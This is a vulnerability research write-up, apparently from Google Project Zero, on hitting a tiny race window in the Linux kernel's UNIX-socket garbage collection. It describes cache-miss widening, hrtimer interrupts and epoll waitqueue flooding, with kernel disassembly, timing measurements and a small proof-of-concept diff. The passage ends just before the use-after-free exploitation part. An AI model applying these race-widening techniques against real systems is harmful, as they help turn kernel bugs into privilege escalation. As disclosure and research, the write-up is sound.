Racing against the clock -- hitting a tiny kernel race window

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (I found it while trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT. (With CONFIG_PREEMPT, it would be possible to preempt a thread with another thread, as I described at LSSEU2019.)

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)
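As background on where inflight references come from, here is a minimal userspace sketch of SCM_RIGHTS file descriptor passing. The helper names send_fd() and recv_fd() are made up for illustration; only the socket API calls are real. While a message sent this way sits unread in a receive queue, its SKB holds a reference to the passed file.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>

/* Hypothetical helper: queue fd_to_send on sock as an SCM_RIGHTS message.
 * Returns 0 on success, -1 on error. */
static int send_fd(int sock, int fd_to_send)
{
    char byte = 'x'; /* one byte of ordinary payload to carry the control data */
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align; /* forces correct alignment of buf */
    } ctrl;
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = ctrl.buf, .msg_controllen = sizeof(ctrl.buf),
    };
    memset(&ctrl, 0, sizeof(ctrl));
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: receive one SCM_RIGHTS message from sock.
 * Returns the newly installed FD, or -1 on error. */
static int recv_fd(int sock)
{
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = ctrl.buf, .msg_controllen = sizeof(ctrl.buf),
    };
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS)
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

A reference loop forms when, for example, one end of a socketpair() is sent over the other end (so that it lands in its own receive queue) and both FDs are then closed without receiving it: the socket is now referenced only by an SKB queued on itself, which is the kind of garbage that unix_gc() exists to collect.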

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

Meanwhile, __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.
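The "increment refcount, then recheck the pointer" idea can be modeled in userspace with C11 atomics. This is only a sketch of the pattern, not the kernel patch: struct obj, get_unless_zero() and lookup_live() are hypothetical names, and safe memory reclamation (RCU in the kernel) is assumed rather than modeled.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct file: just a refcount. */
struct obj {
    atomic_long refcount;
};

/* Take a reference unless the refcount is already zero
 * (the role get_file_rcu() plays in the text). */
static bool get_unless_zero(struct obj *o)
{
    long old = atomic_load(&o->refcount);
    while (old != 0) {
        /* On failure, old is reloaded with the current value. */
        if (atomic_compare_exchange_weak(&o->refcount, &old, old + 1))
            return true;
    }
    return false;
}

/* Look up the object in a table slot and return a counted reference that
 * is known to be "live": after taking the reference, recheck that the slot
 * still points at the same object; otherwise drop it and retry. */
static struct obj *lookup_live(_Atomic(struct obj *) *slot)
{
    for (;;) {
        struct obj *o = atomic_load(slot);
        if (o == NULL)
            return NULL;
        if (!get_unless_zero(o))
            continue;                          /* object is dying, retry */
        if (atomic_load(slot) == o)
            return o;                          /* slot unchanged: live */
        atomic_fetch_sub(&o->refcount, 1);     /* lost a race: put, retry */
    }
}
```

The recheck is what closes the gap: a positive refcount alone only proves "some refcounted state", while a table slot that still points at the object proves that a live reference existed at the time of the recheck.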

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed.

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,
                                 fmode_t mask, unsigned int refs)
{
        struct file *file;

        rcu_read_lock();
loop:
        file = files_lookup_fd_rcu(files, fd); // race window start
        if (file) {
                /* File object ref couldn't be taken.
                 * dup2() atomicity guarantee is the reason
                 * we loop to catch the new file (or NULL pointer)
                 */
                if (file->f_mode & mask)
                        file = NULL;
                else if (!get_file_rcu_many(file, refs)) // race window end
                        goto loop;
        }
        rcu_read_unlock();

        return file;
}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax
<__fget_files+0x21> sbb    rax,rax
<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]
<__fget_files+0x28> and    eax,r8d
<__fget_files+0x2b> lea    rax,[rdx+rax*8]
<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START
; r12 now contains file*
<__fget_files+0x32> test   r12,r12
<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>
<__fget_files+0x37> mov    eax,r9d
<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)
<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>
<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)
<__fget_files+0x46> lea    rdx,[r12+0x38]
<__fget_files+0x4b> test   rax,rax
<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>
<__fget_files+0x50> lea    rcx,[rsi+rax*1]
<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.
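Picking a warm-up FD number on the same cache line is simple arithmetic. The sketch below assumes 64-byte cache lines, pointer-sized FD table entries, and a cache-line-aligned FD array; warmup_fd_for() is a hypothetical helper name, not something from the PoC.

```c
#include <stddef.h>

#define CACHE_LINE_SIZE 64 /* assumption: typical x86-64 line size */
#define FDS_PER_LINE ((int)(CACHE_LINE_SIZE / sizeof(void *)))

/* Return an FD number different from victim_fd whose FD table slot lies on
 * the same cache line as victim_fd's slot (under the assumptions above). */
static int warmup_fd_for(int victim_fd)
{
    int line_start = victim_fd - victim_fd % FDS_PER_LINE;
    /* Use the first slot of the line, or the second one if the victim
     * already occupies the first. */
    return (line_start == victim_fd) ? line_start + 1 : line_start;
}
```

The caller still has to make sure that the returned FD number actually refers to an open file (for example by installing one there with dup2()), so that the warm-up dup() takes the same code path as the real attempt.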

An interruption

Okay, a cache miss might be something like a few dozen or maybe a hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter (TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.
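Roughly, the waiter setup described above could be sketched as follows. add_epoll_waiters() is a hypothetical helper, not the PoC's code; it deliberately leaves all FDs open, because the watches go away when the FDs are closed.

```c
#include <stdlib.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Hypothetical helper: duplicate target_fd n_dups times, then watch every
 * duplicate from each of n_epoll separate epoll instances.
 * Returns the number of watches installed, or -1 on error. */
static long add_epoll_waiters(int target_fd, int n_epoll, int n_dups)
{
    long installed = 0;
    int *dups = malloc(sizeof(int) * (size_t)n_dups);
    if (dups == NULL)
        return -1;

    for (int i = 0; i < n_dups; i++) {
        dups[i] = dup(target_fd);
        if (dups[i] < 0) {
            free(dups);
            return -1;
        }
    }

    for (int e = 0; e < n_epoll; e++) {
        int ep = epoll_create1(0);
        if (ep < 0) {
            free(dups);
            return -1;
        }
        for (int i = 0; i < n_dups; i++) {
            /* Each (epoll instance, FD number) pair is a separate watch. */
            struct epoll_event ev = { .events = EPOLLIN, .data.fd = dups[i] };
            if (epoll_ctl(ep, EPOLL_CTL_ADD, dups[i], &ev) != 0) {
                free(dups);
                return -1;
            }
            installed++;
        }
    }

    free(dups); /* frees only the bookkeeping array; the FDs stay open */
    return installed;
}
```

With the numbers from the text, add_epoll_waiters(timer_fd, 500, 100) would aim for 50 000 watches on one file; depending on the system, resource limits such as RLIMIT_NOFILE may have to be raised first.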

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
      • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
      • If it returns the old victim FD number:
          • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
          • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.
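The decision tree above can be written down as a small classifier. The enum and function names here are made up for illustration; the logic only restates the list, under the same precondition that no FD number below the victim FD is unused.

```c
#include <stdbool.h>

enum race_outcome {
    RACE_DUP_TOO_LATE,        /* dup() failed: file* already gone from table */
    RACE_DUP_TOO_EARLY,       /* dup() got a fresh FD above the victim FD */
    RACE_DUP_SLIGHTLY_EARLY,  /* victim FD number reused, SKB still queued */
    RACE_SUCCESS,             /* victim FD number reused, GC removed the SKB */
    RACE_UNEXPECTED,          /* FD below the victim: precondition violated */
};

/* dup_ret:       return value of the racing dup() call
 * victim_fd:     FD number that was closed during the attempt
 * recv_got_data: whether recvmsg() on dup_ret returned data
 *                (only meaningful if dup_ret == victim_fd) */
static enum race_outcome classify_attempt(int dup_ret, int victim_fd,
                                          bool recv_got_data)
{
    if (dup_ret == -1)
        return RACE_DUP_TOO_LATE;
    if (dup_ret > victim_fd)
        return RACE_DUP_TOO_EARLY;
    if (dup_ret < victim_fd)
        return RACE_UNEXPECTED;
    return recv_got_data ? RACE_DUP_SLIGHTLY_EARLY : RACE_SUCCESS;
}
```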

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@
     }
 
+#if 0
     // bounce socket's file refcount over to other cpu
     pin_to(2);
     close(SYSCHK(dup(RESURRECT_FD+1-1)));
     pin_to(1);
+#endif
 
     //printf("setting timer\n");
@@ -352,5 +354,5 @@
     close(loop_root);
     while (ts_is_in_future(spin_stop))
-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));
+      close(SYSCHK(dup(RESURRECT_FD)));
     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations (cache state, branch predictor state, frequency scaling, or something along those lines), but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing spread is also very close to one period of the core crystal clock - the TSC/core crystal clock ratio on this machine is 117, so one crystal clock period is 117 TSC ticks. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)
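The rounding that both options rely on is plain modular arithmetic on TSC values. The sketch below assumes, as the measurements suggest but do not prove, that LAPIC timer edges fall on exact multiples of the TSC/crystal clock ratio and that a deadline is effectively rounded down to the previous edge; the function names are hypothetical.

```c
#include <stdint.h>

/* TSC value of the last LAPIC timer edge at or before tsc_deadline,
 * assuming edges occur at multiples of tsc_per_lapic_tick. */
static uint64_t prev_lapic_edge(uint64_t tsc_deadline,
                                uint64_t tsc_per_lapic_tick)
{
    return tsc_deadline - tsc_deadline % tsc_per_lapic_tick;
}

/* Distance in TSC ticks from that edge to the programmed deadline.
 * For option 2, this is the amount by which the spinloop-based launch
 * time would be shifted down. */
static uint64_t distance_to_prev_edge(uint64_t tsc_deadline,
                                      uint64_t tsc_per_lapic_tick)
{
    return tsc_deadline % tsc_per_lapic_tick;
}
```

With the ratio of 117 mentioned earlier, a deadline at TSC value 1000 would map to the edge at 936, a distance of 64 ticks.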

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.
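The underlying calculation is short. MPERF advances at a fixed reference rate while APERF advances at the rate the core actually runs at, so the ratio of their deltas scales a base frequency to the average effective frequency over the sampling interval. The sketch below is not the kernel's code; effective_khz() and the base_khz parameter are assumptions for illustration, and reading the MSRs themselves (which needs kernel privileges) is left out.

```c
#include <stdint.h>

/* Average effective frequency in kHz between two samples of APERF/MPERF.
 * base_khz is the frequency corresponding to APERF/MPERF == 1.
 * Returns 0 if MPERF did not advance between the samples.
 * (No overflow handling; fine for short sampling intervals.) */
static uint64_t effective_khz(uint64_t aperf0, uint64_t mperf0,
                              uint64_t aperf1, uint64_t mperf1,
                              uint64_t base_khz)
{
    uint64_t d_aperf = aperf1 - aperf0;
    uint64_t d_mperf = mperf1 - mperf0;
    if (d_mperf == 0)
        return 0;
    return base_khz * d_aperf / d_mperf;
}
```

The shorter the interval between the two samples, the closer the result is to an instantaneous frequency; with a long interval it is an average that can hide frequency changes in between.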

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

